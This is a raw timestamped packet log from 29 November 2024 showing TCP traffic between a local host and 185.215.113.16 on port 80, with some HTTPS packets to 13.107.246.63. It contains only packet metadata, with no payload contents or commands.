                                                                                                                                                                                    Nov 29, 2024 19:49:38.751355886 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751390934 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751482964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751575947 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751645088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751657963 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751693964 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751787901 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751804113 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.751844883 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.752386093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.752553940 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.752566099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.752605915 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.752691031 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.752727985 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753165960 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753325939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753376961 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753490925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753653049 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753665924 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753693104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.753777981 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.754403114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.754426956 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.754441023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.754448891 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.754487038 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.754723072 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755182028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755193949 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755217075 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755230904 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755323887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755481005 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755948067 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.755990982 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756133080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756145000 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756175041 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756354094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756401062 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756822109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756834030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756850958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756876945 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.756954908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757011890 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757409096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757565975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757576942 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757617950 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757752895 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.757812977 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.758374929 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.758387089 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.758399010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.758443117 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.758533001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.758636951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759155035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759166002 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759180069 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759212971 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759298086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759402037 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759932995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759943962 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759959936 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.759982109 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760066032 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760413885 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760678053 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760842085 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760853052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760893106 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.760987043 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761023998 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761660099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761672974 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761684895 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761698008 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761719942 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.761744022 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.762096882 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.762275934 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.762288094 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.762319088 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.762435913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.762516975 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763020992 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763032913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763143063 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763165951 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763343096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763406038 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763775110 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763906002 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763917923 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.763964891 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764038086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764111996 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764703989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764717102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764730930 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764755964 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.764839888 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765197992 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765321016 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765485048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765496969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765508890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765525103 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.765549898 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766136885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766285896 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766302109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766341925 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766426086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766510963 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766906023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766918898 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.766953945 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767054081 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767209053 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767612934 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767807007 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767818928 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767829895 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767878056 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767955065 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.767997980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768131971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768196106 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768208027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768223047 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768234968 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768235922 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768270016 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768296957 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768310070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768348932 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768454075 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768599987 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.768928051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769011021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769022942 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769062042 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769150019 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769192934 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769706964 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769785881 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769798040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769830942 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769897938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.769937992 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.770498991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782093048 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782155037 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782195091 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782387018 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782407999 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782459021 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.782464027 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.785159111 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.785183907 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.785348892 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.785501003 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.785514116 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.815015078 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.878978968 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.879456997 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.879481077 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.879954100 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:38.879960060 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951841116 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951855898 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951867104 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951916933 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951941967 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951961994 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951978922 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.951992035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952040911 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952068090 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952603102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952668905 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952692032 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952704906 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952784061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.952825069 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.953366995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.953411102 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.953439951 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.953453064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.953489065 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954025030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954045057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954091072 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954164028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954174995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954210043 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954745054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954818010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954829931 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954869032 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.954977989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955018997 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955523014 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955604076 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955615044 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955646038 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955728054 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.955806971 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.956372023 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.956420898 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.956432104 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.956478119 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.956532955 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.956572056 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957109928 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957173109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957190037 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957240105 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957262039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957329035 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957845926 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957933903 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957946062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.957978010 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.958127975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.958185911 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.958873987 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.958949089 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.958961010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.959012985 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.959163904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.959214926 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.959934950 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.959954977 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.959965944 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960006952 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960028887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960071087 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960396051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960445881 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960458040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960486889 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960597038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.960942030 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961055040 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961075068 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961087942 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961124897 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961203098 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961287975 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961791039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961842060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961858988 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961891890 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.961981058 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962378025 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962559938 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962650061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962661028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962688923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962759972 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.962800980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.963406086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.963458061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.963468075 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.963526011 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.963608980 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.963645935 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964135885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964265108 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964281082 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964324951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964397907 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964632034 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964910030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964982986 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.964996099 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965049982 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965112925 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965152025 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:38.965764046 CET8049755185.215.113.16192.168.2.6
